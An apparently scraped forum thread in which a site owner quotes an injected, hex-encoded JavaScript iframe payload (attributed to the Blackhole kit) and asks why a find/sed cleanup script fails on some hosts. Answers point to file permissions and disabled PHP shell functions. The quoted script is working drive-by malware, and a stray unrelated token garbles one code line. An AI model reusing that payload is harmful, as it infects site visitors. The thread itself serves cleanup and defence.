Why some servers can't run SED commands?

Recently I've been trying to fix a slew of viruses on my server which I suspect is due to the Blackhole toolkit. It appends a js-script to the end of index.php and .html files which looks like this..

<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f6578706c6f726574726176656c6e757273696e672e636f6d2f6e6577732e7068703f74703d66646661336165353965343464313930222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>

It's a encoded version of the standard iframe virus. I've been trying to remove it by running a php script like the one below. (which was a solution from stack overflow).

$开发者_如何学Godir = "./";

$removejs = `find $dir -name "*.php" -type f |xargs sed -i '<script>var t=.*eval.*script>##g' 2>&1`;

The problem is, the script works for some servers while others just seem to have no effect. Does anyone know why? I've tried it on at least 10 separate webhosts. The script only runs successfully on about 3 hosts. The rest just doesn't do anything. What settings do I need to change ?

Appreciate any help I can get. Thanks !

1. If you're running this script right using http request, i.e. it gets runned by webserver with privileges of user like nobody or apache - then sed -i command used in this script just can't change anything in the files that find founds due to insufficient privileges.

2. Your PHP installation might have backticks and/or any other form of command execution disabled, as it is usually a direct security threat (using safe_mode, using PHP suhosin patch directives, etc).

Your best bet would be checking webserver logs on hosts that haven't executed this script.

Some of the hosts you're using probably have shell functions (exec, shell_exec, system, etc.) disabled, possibly via PHP's infamous safe_mode configuration option. You will need to either rewrite the script in pure PHP, or find another way to strip out the inserted content.